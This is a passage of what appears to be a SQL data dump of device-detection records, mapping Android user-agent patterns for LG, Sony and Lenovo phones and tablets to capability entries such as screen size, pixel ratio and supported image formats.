LGL15G/V100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGL23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGL41C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGLS620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGLS660) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGLS740) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGLS885) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGMS323) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGMS395) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LGMS500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LIFE PLAY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT18i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT22i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT22i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT25i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT26i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT26i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT26ii) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT26w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT28h) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT28i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT29i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT30p) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LT971) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A3000-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A316i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A316i/S008) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A319) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A328) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A328t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A338t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A3500-F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A3500-FL) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A3500-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A3600-d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A369i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A369i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A3800-d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A390_ROW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A390_ROW/S030) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A399) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A516) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A516) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A536) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A536) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A5500-F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A5500-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A5500-H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A560/JLS36C) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A606) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A680_ROW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A680_ROW) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A706_ROW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A7600-F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A7600-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A800; 480*800; CTC/2.0) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A806) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A816) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A850+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A850/S105) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A859) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A859) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A859/JDQ39) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A880) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A916) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo A936) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo B6000-F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo B6000-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo B8000-F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo B8000-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo B8000-H/JDQ39) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo B8080-F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo B8080-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo B8080-H/JLS36C) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo K30-T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo K30-W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo K80M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Lenovo K900_ROW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 